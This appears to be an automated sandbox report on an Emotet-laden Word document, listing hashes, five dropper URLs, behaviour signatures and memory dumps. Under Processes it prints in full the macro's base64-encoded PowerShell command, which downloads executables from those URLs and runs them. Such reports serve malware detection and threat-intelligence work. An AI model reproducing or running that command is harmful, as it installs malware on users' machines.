Analysis

  • max time kernel
    68s
  • max time network
    25s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    19-09-2020 13:21

General

  • Target

    emotet_e3_5a526eea1244daf041113d9444a0193fce82f1a10c4f824903c8ef1282affd4c_2020-09-19__132010642456._doc.doc

  • Size

    230KB

  • MD5

    fdccd404e39a0aaa7ac57a6719f7f831

  • SHA1

    92eef9bb7641821014964e7da7d3abbafaa2901b

  • SHA256

    5a526eea1244daf041113d9444a0193fce82f1a10c4f824903c8ef1282affd4c

  • SHA512

    6b077276b519bba60aa9b9f55163fcead5b1f58e520f0c12cb99b3eb8bed2a7f96d00a0595a9b65dcd601c8b5911c5184952665a44ac0100660caf24d3a15d06

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://arsan.com.br/img_b2w/jstgflap98/

exe.dropper

http://koester-pb.de/cgi-bin/HoDIPqV/

exe.dropper

http://aragonmetal.com/_installation/LPMGMZroO/

exe.dropper

https://www.witdigi.com/wp-content/uploads/iBeE/

exe.dropper

http://yellowstonefitness.com/j5es7cx/QgLkys4ga64g228/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_5a526eea1244daf041113d9444a0193fce82f1a10c4f824903c8ef1282affd4c_2020-09-19__132010642456._doc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1088
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABQAGsAaAByADUAZABwAD0AJwBaAHAAawByAG0AawBxACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAYABVAGAAUgBpAGAAVABZAFAAYABSAE8AVABPAGMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQA2AF8AdQBkAHAAMAAgAD0AIAAnAEMAYwBiAHAAJwA7ACQAWQBxADEAbwBsAHQAcQA9ACcASwBvADIAZgAzAHoAZAAnADsAJABCADgAOQB0ADUAcwB2AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQARQA2AF8AdQBkAHAAMAArACcALgBlAHgAZQAnADsAJABOAHYAbQAwAHIAYgB0AD0AJwBGAGQAMAA3AG8AOABxACcAOwAkAFYAZgBnAHgAZQA3ADAAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBFAGIAQwBMAGkARQBOAFQAOwAkAFgANwA1AHgAMQBvADAAPQAnAGgAdAB0AHAAOgAvAC8AYQByAHMAYQBuAC4AYwBvAG0ALgBiAHIALwBpAG0AZwBfAGIAMgB3AC8AagBzAHQAZwBmAGwAYQBwADkAOAAvACoAaAB0AHQAcAA6AC8ALwBrAG8AZQBzAHQAZQByAC0AcABiAC4AZABlAC8AYwBnAGkALQBiAGkAbgAvAEgAbwBEAEkAUABxAFYALwAqAGgAdAB0AHAAOgAvAC8AYQByAGEAZwBvAG4AbQBlAHQAYQBsAC4AYwBvAG0ALwBfAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC8ATABQAE0ARwBNAFoAcgBvAE8ALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHcAaQB0AGQAaQBnAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AHAAbABvAGEAZABzAC8AaQBCAGUARQAvACoAaAB0AHQAcAA6AC8ALwB5AGUAbABsAG8AdwBzAHQAbwBuAGUAZgBpAHQAbgBlAHMAcwAuAGMAbwBtAC8AagA1AGUAcwA3AGMAeAAvAFEAZwBMAGsAeQBzADQAZwBhADYANABnADIAMgA4AC8AJwAuACIAcwBwAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABWADIAZgBmAHUANABmAD0AJwBRAHUAcwB3AHkAZgAxACcAOwBmAG8AcgBlAGEAYwBoACgAJABPADIAMwB6AGMAMQBiACAAaQBuACAAJABYADcANQB4ADEAbwAwACkAewB0AHIAeQB7ACQAVgBmAGcAeABlADcAMAAuACIARABPAFcAYABOAGwAbwBgAEEARABGAEkATABFACIAKAAkAE8AMgAzAHoAYwAxAGIALAAgACQAQgA4ADkAdAA1AHMAdgApADsAJABFAHkAdgB0ADEAdwAzAD0AJwBYAGwAZwBpAHYAdQByACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAQgA4ADkAdAA1AHMAdgApAC4AIgBMAGAARQBOAGcAVABoACIAIAAtAGcAZQAgADIAOQA5ADkAMQApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACgAJABCADgAOQB0ADUAcwB2ACkAOwAkAFMAbABiAHUAMABoADEAPQAnAEIAbQA4AHQAOQAyAGQAJwA7AGIAcgBlAGEAawA7ACQASAB6ADIAbAA5AG0AaQA9ACcARwBpAGkAeAA5ADEAYwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBAHkAMAA1AHkAZABpAD0AJwBXAGQAeQBrADYAbgBhACcA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1928

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1088-2-0x0000000008AF0000-0x0000000008AF4000-memory.dmp
    Filesize

    16KB

  • memory/1088-6-0x000000000AB30000-0x000000000AB34000-memory.dmp
    Filesize

    16KB

  • memory/1088-7-0x000000000BBB0000-0x000000000BBB4000-memory.dmp
    Filesize

    16KB

  • memory/1088-17-0x0000000002100000-0x0000000002101000-memory.dmp
    Filesize

    4KB

  • memory/1928-11-0x000007FEE9B40000-0x000007FEEA52C000-memory.dmp
    Filesize

    9.9MB

  • memory/1928-13-0x000000001AAF0000-0x000000001AAF1000-memory.dmp
    Filesize

    4KB

  • memory/1928-12-0x00000000026B0000-0x00000000026B1000-memory.dmp
    Filesize

    4KB

  • memory/1928-14-0x00000000024F0000-0x00000000024F1000-memory.dmp
    Filesize

    4KB

  • memory/1928-15-0x000000001AA20000-0x000000001AA21000-memory.dmp
    Filesize

    4KB

  • memory/1928-16-0x000000001B7F0000-0x000000001B7F1000-memory.dmp
    Filesize

    4KB

  • memory/1928-18-0x000000001C2A0000-0x000000001C2A1000-memory.dmp
    Filesize

    4KB